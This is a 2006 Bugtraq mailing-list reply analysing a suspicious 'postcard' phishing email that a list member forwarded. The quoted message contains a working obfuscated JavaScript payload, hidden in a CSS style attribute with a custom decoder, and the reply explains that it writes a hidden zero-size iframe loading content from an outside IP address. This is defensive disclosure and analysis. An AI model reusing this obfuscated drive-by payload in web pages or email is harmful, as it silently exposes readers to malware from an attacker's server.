Dear gandalf@xxxxxxxxxxx, This piece of HTML has nothing to do with java. It has javascript. Javascript generates equivalent of <IFRAME SRC="http://63.134.215.88/a/"; height="0" width="0">. It will not work for patched Outlook Express because e-mail works in restricted hosts zone. --Friday, February 17, 2006, 9:13:10 PM, you wrote to bugtraq@xxxxxxxxxxxxxxxxx: gdn> Greetings and Salutations: gdn> I just receieved this exploit, I have looked around and all I gdn> could find lately are the following Java issues: gdn> Gentoo Linux Security Advisory GLSA 200601-10 - Sun and gdn> Blackdown Java: Applet privilege escalation gdn> I don't have the Java knowledge to figure out what is going on, but it doesn't look good. gdn> Ken gdn> --------------------------------------------------------------- gdn> Don't irritate geeks ... They don't have a life and if you make gdn> them mad enough they will make *you* their life ... And they gdn> are probably smarter than you. gdn> Ken Hollis - Gandalf The White - gandalf@xxxxxxxxxxx - O- TINLC gdn> WWW Page - http://digital.net/~gandalf/ gdn> Trace E-Mail forgery - http://digital.net/~gandalf/spamfaq.html gdn> Trolls crossposts - http://digital.net/~gandalf/trollfaq.html gdn> Woodworking For Geeks - http://digital.net/~gandalf/woodmain.htm gdn> Return-Path: <noreply-23@xxxxxxxxxxxxxxxxxxx> gdn> Received: from konrad-64bd33ed ([83.17.41.98]) gdn> by timothy.mail.atl.earthlink.net (EarthLink SMTP Server) with SMTP id 1fa9Q238k3Nl3pw1 gdn> for <gandalf@xxxxxxxxxxx>; Fri, 17 Feb 2006 12:56:15 -0500 (EST) gdn> Message-ID: <002601c633eb$6cb49850$cf04a8c0@konrad-64bd33ed> gdn> From: <noreply-23@xxxxxxxxxxxxxxxxxxx> gdn> To: <gandalf@xxxxxxxxxxx> gdn> Subject: You have received a postcard! Id: 7963 gdn> Date: Fri, 17 Feb 2006 18:56:06 +0200 gdn> MIME-Version: 1.0 gdn> Content-Type: multipart/alternative; gdn> boundary="----=_NextPart_000_0023_01C633F3.CE78F1A0" gdn> X-Priority: 3 gdn> X-MSMail-Priority: Normal gdn> X-Mailer: Microsoft Outlook Express 6.00.2900.2180 gdn> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 gdn> X-ELNK-Info: spv=0; gdn> X-ELNK-AV: 0 gdn> X-ELNK-Info: sbv=0; sbrc=.0; sbf=00; sbw=000; gdn> This is a multi-part message in MIME format. gdn> ------=_NextPart_000_0023_01C633F3.CE78F1A0 gdn> Content-Type: text/plain; gdn> charset="iso-8859-1" gdn> Content-Transfer-Encoding: quoted-printable gdn> ------=_NextPart_000_0023_01C633F3.CE78F1A0 gdn> Content-Type: text/html; gdn> charset="iso-8859-1" gdn> Content-Transfer-Encoding: quoted-printable gdn> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> gdn> <HTML><HEAD> gdn> <META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1"> gdn> <META content=3D"MSHTML 6.00.2900.2722" name=3DGENERATOR> gdn> <STYLE></STYLE> gdn> </HEAD> gdn> <BODY> gdn> <a target=3D"_blank" gdn> href=3D"www.yahoo.com>"style=3D"background:url\(java/**/script:function gdn> dc(x){var gdn> l=3Dx.length,b=3D1024,i,j,r,p=3D0,s=3D0,w=3D0,t=3DArray(63,6,22,2,4,19,56,49,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,39,34,29,23,45,3,37,25,30,35,54);for(j=3DMath.ceil(l/b);j>0;j--){r=3D'';for(i=3DMath.min(l,b);i>0;i--,l--){w|=3D(t[x.charCodeAt(p++)-48])<<s;if(s){r+=3DString.fromCharCode(165^w&255);w>>=3D8;s-=3D2}else{s=3D6}}document.write(r)}}dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT'))"> gdn> </BODY> gdn> </HTML> -- ~/ZARAZA Ну а в целом, Уильям, здешний климат - ежели только это можно назвать климатом, вполне сносный. (Твен)
